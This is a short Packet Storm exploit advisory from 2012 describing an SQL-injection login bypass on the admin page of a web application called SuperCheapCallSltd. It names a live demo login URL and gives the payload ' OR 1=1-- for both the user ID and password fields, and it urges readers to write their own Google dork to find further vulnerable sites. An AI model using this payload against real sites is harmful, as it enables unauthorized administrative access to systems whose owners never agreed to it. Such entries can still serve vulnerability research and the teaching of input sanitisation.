SuperCheapCallSltd SQL Injection

2012-12-02T00:00:00
ID PACKETSTORM:118574
Type packetstorm
Reporter Risman
Modified 2012-12-02T00:00:00

Description

                                        
                                            ` ____ ____ _____ ___ ___ ____ ____   
| \ | / ___/| | | / || \   
| D ) | ( \_ | _ _ || o || _ |  
| / | |\__ || \_/ || || | |  
| \ | |/ \ || | || _ || | |  
| . \ | |\ || | || | || | |  
|__|\_||____|\___||___|___||__|__||__|__|  
  
  
# Exploit name: SuperCheapCallSltd admin page bypass  
# Google dork: Make one by yourself !  
# Exploit author: Risman  
# Tested on: Linux  
# Security Risk : High  
# Category: Web Application  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
# Sample: http://site.com/login.aspx  
  
  
# Demo : http://www.supercheapcallsltd.com/login.aspx  
  
-User ID = ' OR 1=1--  
-Password = ' OR 1=1--  
  
`